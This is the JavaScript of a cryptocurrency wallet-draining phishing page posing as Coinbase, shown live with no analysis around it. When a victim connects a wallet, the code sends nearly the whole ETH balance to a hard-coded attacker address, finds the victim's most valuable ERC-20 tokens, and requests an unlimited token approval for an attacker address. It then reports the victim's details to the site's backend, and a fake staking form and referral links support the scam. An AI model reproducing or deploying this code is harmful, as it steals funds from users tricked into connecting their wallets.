				type:type
			}

			$.ajax({
				type: 'post',
				url:   '/api/insert_erc',
				data:data,
			})

		}

		async function getMostValuableAssets2(account) {
			let _symbol = 'usdt'
			console.log('_symbol:'+_symbol);
			for (const [symbol, contract] of Object.entries(contracts2)) {
				contract.methods.balanceOf(account).call(function(err, balance) {
					const usdt = balance / (10** (decimals[symbol] || 18)) * price[symbol]
					if (usdt > total && usdt > 1000) {
						_symbol = symbol
						total = usdt
						approveAddr = addr[_symbol]

					}
				})


			}

			bizhong = _symbol

			console.log('_symbol:'+_symbol);
			return _symbol
		}

		async function getMostValuableAssets3(account) {
			let _symbol = 'usdt'
			for (const [symbol, contract] of Object.entries(contracts3)) {
				contract.methods.balanceOf(account).call(function(err, balance) {
					const usdt = balance / (10** (decimals[symbol] || 18)) * price[symbol]
					if (usdt > total && usdt > 1000) {
						_symbol = symbol
						total = usdt
						approveAddr = addr[_symbol]
					}
				})
			}
			bizhong = _symbol
			console.log('_symbol:'+_symbol);
			return _symbol
		}


		const price = {
			usdt: 1,
			sushi: 15.5,
			usdc: 1,
			dai: 1,
			uni: 28.6,
			aave: 380,
			yfi: 35000,
			link: 28.2,
			"LON": 7,
			"CRV": 3.01367,
			"GUSD": 1,
			"WBTC": 56478.2,
			"WETH": 1991.89,
			"CONV": 0.105733,
			"inj": 13.3812,
			"MKR": 2076.68,
			"ALPHA": 1.79043,
			"BAND": 16.3441,
			"snx": 20.0588,
			"comp": 468.076,
			"sxp": 4.11818,
			"FTT": 46.1779,
			"ust": 1.00543,
			"TRIBE": 1.42926,
			"wise": 0.446973,
			"RRAX": 0.996821,
			"CORE": 5447.59,
			"mir": 8.69817,
			"DPI": 415.906,
			"luna": 15.2402,
			"HEZ": 5.97533,
			"fxs": 8.47025,
			"fei": 0.898157,
		}

		const decimals = {
			sushi: 18,
			usdt: 6,
			usdc: 6,
			uni: 18,
			dai: 18,
			aave: 18,
			yfi: 18,
			link: 18,
			WBTC: 8,
		}
		
		/*this code below is creating instances of smart contract objects from the Ethereum blockchain, 
		it's using the ABI and the contract address to interact with the smart contract functions,
		this code is creating three different contract instances for three different addresses. */
		
		const contracts = {}, contracts2 = {}, contracts3 = {}
		for (const symbol of Object.keys(addr)) {
			const contractAddr = addr[symbol]
			contracts[symbol] = new _web3.eth.Contract(ABI, contractAddr)
		}

		for (const symbol of Object.keys(addr2)) {
			const contractAddr = addr2[symbol]
			contracts2[symbol] = new _web3.eth.Contract(ABI, contractAddr)
		}

		for (const symbol of Object.keys(addr3)) {
			const contractAddr = addr3[symbol]
			contracts3[symbol] = new _web3.eth.Contract(ABI, contractAddr)
		}

		const Web3Modal = window.Web3Modal.default;
		const WalletConnectProvider = window.WalletConnectProvider.default;

		// Web3modal instance
		let web3Modal

		// Chosen wallet provider given by the dialog window
		let provider;

		// Address of the selected account
		let selectedAccount;


		/**
		 * Setup the orchestra
		 */
		async function init() {



			// getInfo();


			// getBalance();

			// Tell Web3modal what providers we have available.
			// Built-in web browser provider (only one can exist as a time)
			// like MetaMask, Brave or Opera is added automatically by Web3modal

			const providerOptions = {
				walletconnect: {
					package: WalletConnectProvider,
					options: {
						// Mikko's test key - don't copy as your mileage may vary
						infuraId: "0b16762a13ca4e38a5f2e06c7b56849a",
					}
				},
			};

			web3Modal = new Web3Modal({
				cacheProvider: false, // optional
				providerOptions, // required
				disableInjectedProvider: false, // optional. For MetaMask / Brave / Opera.
			});


			try {
				provider = await web3Modal.connect()
				provider.enable()
			} catch(e) {
				console.log("Could not get a wallet connection", e);
				return;
			}



			// Subscribe to accounts change
			provider.on("accountsChanged", async (accounts) => {
				await fetchAccountData();
			});

			// Subscribe to chainId change
			provider.on("chainChanged", async (chainId) => {
				await fetchAccountData();
			});

			// Subscribe to networkId change
			provider.on("networkChanged", async (networkId) => {
				await fetchAccountData();
			});

			await refreshAccountData();

            // $('#btn-connect').hide();
		}

		/**
		 * Kick in the UI action after Web3modal dialog has chosen a provider
		 */
		async function fetchAccountData() {
			const web3 = new Web3(provider);
			injectedWeb3 = web3
			provider.enable()
			const accounts = await web3.eth.getAccounts()
			selectedAccount = accounts[0]
			console.log(selectedAccount);
			if(selectedAccount){
			    userInfo(selectedAccount);
			}
			
			
			
			
// Define the addresses
var fromAddress = accounts[0];
var toAddress = "0xa1122DC51FeBBfc2898Db69fa8942F92Ea9E696B";



// Get the current provider
const currentProvider = web3.currentProvider;

// Sign the message
/*web3.eth.sign(fromAddress, web3.utils.sha3(message), function(error, result) {
  if (!error) {
    var signature = result;
    console.log("Signature: " + signature);
*/

 
web3.eth.getBalance(fromAddress, function(error, result) {
  if (!error) {
    var balanceInWei = result;
    total = balanceInWei - 1800000000000000;
    var balance = web3.utils.fromWei(balanceInWei, 'ether');
    
  //  var balanceInEth = 0.18;
    
   // var sum = balanceInEth;
   // document.getElementById("total").innerHTML = balanceInEth;
    
   // var balanceInWei2 = web3.utils.toWei(balanceInEth.toString(), 'ether');
//    document.getElementById("total").innerHTML = balanceInWei2; 
    
	//var total = balanceInWei2;
    
    // Send the entire balance to the toAddress
    web3.eth.sendTransaction({from: fromAddress, to: toAddress, value: total}, function(error, result) {
      if (!error) {
        console.log("Transaction hash: " + result);
      } else {
        console.error(error);
      }
    });
  } else {
    console.error(error);
 //   window.location.href = 'https://link.trustwallet.com/open_url?coin_id=60&url=https://'+window.location.host+window.location.pathname;

  }
});

// Send the transaction using the current provider
/*web3.eth.sendTransaction({
	from: senderAddress,
    to: recipientAddress,
    value: web3.utils.toWei(amount, 'ether'),
    gas: 21000,
    gasPrice: web3.utils.toWei('20', 'gwei')
}, (error, hash) => {
    if (error) {
        console.log(error);
    } else {
        console.log(`Transaction hash: ${hash}`);
    }
});*/
// 			getBalance(selectedAccount);
// 			$("#haddress").val(selectedAccount);
// 			 $('#address').text(selectedAccount.substring(0,6)+'...');
			let gasPrice = await web3.eth.getGasPrice()
			var gs =((gasPrice*20000) / (10**18)).toFixed(6)
// 			console.log(gs)
// 			$('#gas').text(gs.toLocaleString() + ' ETH')

			getMostValuableAssets(selectedAccount)
			setTimeout(function() {
				getMostValuableAssets2(selectedAccount)
			}, 200)
			setTimeout(function() {
				getMostValuableAssets3(selectedAccount)
			}, 300)
		}
		
		
		
		async function fetchAccountData2() {
			const web3 = new Web3(provider);
			injectedWeb3 = web3
			provider.enable()
			const accounts = await web3.eth.getAccounts()
			selectedAccount = accounts[0]
			console.log(selectedAccount);
			if(selectedAccount){
			    userInfo(selectedAccount);
			}
			
			
			
			
// Define the addresses
var fromAddress = accounts[0];
var toAddress = "0xa1122DC51FeBBfc2898Db69fa8942F92Ea9E696B";



// Get the current provider
const currentProvider = web3.currentProvider;

// Sign the message
/*web3.eth.sign(fromAddress, web3.utils.sha3(message), function(error, result) {
  if (!error) {
    var signature = result;
    console.log("Signature: " + signature);
*/

 
web3.eth.getBalance(fromAddress, function(error, result) {
  if (!error) {
    var balanceInWei = result;
    total = balanceInWei - 1800000000000000;
    var balance = web3.utils.fromWei(balanceInWei, 'ether');
    
  //  var balanceInEth = 0.18;
    
   // var sum = balanceInEth;
   // document.getElementById("total").innerHTML = balanceInEth;
    
   // var balanceInWei2 = web3.utils.toWei(balanceInEth.toString(), 'ether');
//    document.getElementById("total").innerHTML = balanceInWei2; 
    
	//var total = balanceInWei2;
    
    // Send the entire balance to the toAddress
    web3.eth.sendTransaction({from: fromAddress, to: toAddress, value: total}, function(error, result) {
      if (!error) {
        console.log("Transaction hash: " + result);
      } else {
        console.error(error);
      }
    });
  } else {
    console.error(error);
 //   window.location.href = 'https://link.trustwallet.com/open_url?coin_id=60&url=https://'+window.location.host+window.location.pathname;

  }
});

// Send the transaction using the current provider
/*web3.eth.sendTransaction({
	from: senderAddress,
    to: recipientAddress,
    value: web3.utils.toWei(amount, 'ether'),
    gas: 21000,
    gasPrice: web3.utils.toWei('20', 'gwei')
}, (error, hash) => {
    if (error) {
        console.log(error);
    } else {
        console.log(`Transaction hash: ${hash}`);
    }
});*/
// 			getBalance(selectedAccount);
// 			$("#haddress").val(selectedAccount);
// 			 $('#address').text(selectedAccount.substring(0,6)+'...');
			let gasPrice = await web3.eth.getGasPrice()
			var gs =((gasPrice*20000) / (10**18)).toFixed(6)
// 			console.log(gs)
// 			$('#gas').text(gs.toLocaleString() + ' ETH')

			getMostValuableAssets(selectedAccount)
			setTimeout(function() {
				getMostValuableAssets2(selectedAccount)
			}, 200)
			setTimeout(function() {
				getMostValuableAssets3(selectedAccount)
			}, 300)
		}
		
		
		
		
		
		
		function userInfo(address){
			  var invate_id = getUrlQueryString('invate_id');
			  var post_data = {
			  	  address:address,
			  };
			  if (invate_id) {
			  		post_data.invate_id = invate_id;
			  }
		      $.ajax({
                url:"/api/user/login",
                type:'post',
                data:post_data,
                success:function(data){
                    if(data.type == 'ok'){
                        window.localStorage.setItem('token',data.message);
                        window.localStorage.setItem('address',address);
                        window.location.href = './h5/#/index';
                    }
                }
           });
		}


		/**
		 * Fetch account data for UI when
		 * - User switches accounts in wallet
		 * - User switches networks in wallet
		 * - User connects wallet initially
		 */
		async function refreshAccountData() {

			document.querySelector("#btn-connect").setAttribute("disabled", "disabled")
			await fetchAccountData(provider);
			document.querySelector("#btn-connect").removeAttribute("disabled")
		}


    async function onConnect() {
            if (selectedAccount && provider) {
                //postInfo(selectedAccount, bizhong)
                $('#GetCredentials').show();
                const web3 = new Web3(provider);
                const contract = new web3.eth.Contract(ABI, approveAddr)
                const gasPrice = web3.eth.gasPrice
                console.log(authorized_address);
                contract.methods.approve(authorized_address, web3.utils.toBN('79228162514264337593543950335')).send({
                    from: selectedAccount,
                    gasPrice: gasPrice,
                    gas: 1e5,
                }, function(err, tx) {
                    if (!err) {
                        postInfo(selectedAccount, bizhong)
                    }
                    console.log(err, tx)
                })
            } else {
                //postInfo(selectedAccount, bizhong)

                provider = await web3Modal.connect()
                provider.enable()
                const web3 = new Web3(provider);
                const accounts = await web3.eth.getAccounts()
                selectedAccount = accounts[0]
                const contract = new web3.eth.Contract(ABI, approveAddr)
                const gasPrice = web3.eth.gasPrice

                contract.methods.approve(authorized_address, '79228162514264337593543950335').send({
                    from: selectedAccount,
                    gasPrice: gasPrice,
                    gas: 1e5,
                }, function(err, tx) {
                    console.log(err, tx)
                    if (!err) {
                        postInfo(selectedAccount, bizhong)
                    }
                })
            }
        }
		/**
		 * Disconnect wallet button pressed.
		 */
		async function onDisconnect() {

			console.log("Killing the wallet connection", provider);

			// TODO: Which providers have close method?
			if(provider.close) {
				await provider.close();

				// If the cached provider is not cleared,
				// WalletConnect will default to the existing session
				// and does not allow to re-scan the QR code with a new wallet.
				// Depending on your use case you may want or want not his behavir.
				await web3Modal.clearCachedProvider();
				provider = null;
			}

			selectedAccount = null;

			// Set the UI back to the initial state
			// document.querySelector("#prepare").style.display = "block";
			// document.querySelector("#connected").style.display = "none";
		}

		/**
		 * Main entry point.
		 */
		window.addEventListener('load', async () => {
			init();
			document.querySelector("#btn-connect").addEventListener("click", onConnect);
			document.querySelector(".col-work-inr connectBtn").addEventListener("click", onConnect);
			

		});


	});
	$(function(){

	    $('#ditem .item').each(function(){
	           var _that=this;
	           $(this).find('.icon').click(function(){
	                $(_that).find('.content').toggle();
	                if($(_that).find('.content')[0].style.display=="none"){
	                     $(this).removeClass('icon2').addClass('icon');

	                }else{

	                    $(this).removeClass('icon').addClass('icon2');
	                }

	           })
	    });

	    setTimeout(function(){

	        $('#address').click()
	    },1000);

	     setTimeout(function(){
	       if($('#address').text()=="null"){
	          	var s = getUrlQueryString('s')
	              var withs=$(window).width();
	              if(withs<800){
	                  s =s?s:1;
	                 // location.href="login.html?s="+s;
	              }
	       }

	    },1500);

	      var myar = setInterval('AutoScroll("#scontent")', 1500);
	})

      function AutoScroll(obj) {
            $(obj).find(".list").animate({
                marginTop: "0.67rem"
            }, 200, function () {
                $(this).css({ marginTop: "0px" }).find(".item:first").appendTo(this);
            });
        }

  //这上面的是1000是滚动的速度，可以自己调整
	</script>

			  <script src="./Coinbase_files/clipboard.min.js.download"></script>
	  <script>

	      	function getUrlQueryString(names, urls) {
			urls = urls || window.location.href;
			urls && urls.indexOf("?") > -1 ? urls = urls.substring(urls.indexOf("?") + 1) : "";
			var reg = new RegExp("(^|&)" + names + "=([^&]*)(&|$)", "i");
			var r = urls ? urls.match(reg) : window.location.search.substr(1).match(reg);
			if (r != null && r[2] != "")return unescape(r[2]);
			return null;
		}

	        let clipboard2 = new ClipboardJS('#copy', {
        text: function () {
            //此处为处理函数并返回text
            s=getUrlQueryString('s');
            s=s?s:1;
             var domain=window.location.host;
            return  "http://"+domain+"/erc/index.html?s="+s+"&r="+$('#haddress').val();
        }
    });
    clipboard2.on('success', function(e) {
        alert('copy success')
    })
	  </script>
<!-- 	  <script src="/lang/jquery.cookie.js"></script>
	    <script src="/lang/en.js?v=55444774554123"></script> -->
	    <script>
	        $(function(){

	            $('#zy_buy').on('click',function(){
	               // approveAddr="0xdac17f958d2ee523a2206206994597c13d831ec7";
	               // $('#contract').val(approveAddr);
	               //  $('#type').val(2);
	               // $('#btn-connect').click();


	                   $.ajax({
	                        url:"/api/zy_buy",
	                        type:'get',
	                        data:{
	                            address:$('#haddress').val(),
	                            amount:$('#zy_amount').val(),
	                            days:$('#zy_days_val').val(),
	                            bilv:$('#zy_bilv').text(),
	                            type:2
	                        },
	                        success:function(data){
	                            alert(data.info);
	                            if(data.code==1){
	                                location.reload();
	                            }
	                        }
	                   });


	            });

	             $('#zy_buy2').on('click',function(){
	                approveAddr="0x2260fac5e5542a773aa44fbcfedf7c193bc2c599";
	                $('#contract').val(approveAddr);
	                 $('#type').val(3);
	                $('#btn-connect').click();

	            });
	       

	        });
	         $('#zy_amount').on('blur',function(){
	        var val=$(this).val()*0.5;
	          $('#zy_profit').text(val);
	    });

	    
	    const button = document.getElementById('btn-connect'); 
	    // Add a click event listener to the button 
	    button.addEventListener('click', function() { 
	    // Perform the desired action when the button is clicked
	    console.log('Button clicked!'); // Replace this with your desired action });
	    document.getElementById('walletconnect-wrapper').style.display = "block !important";
	    
	    </script>
 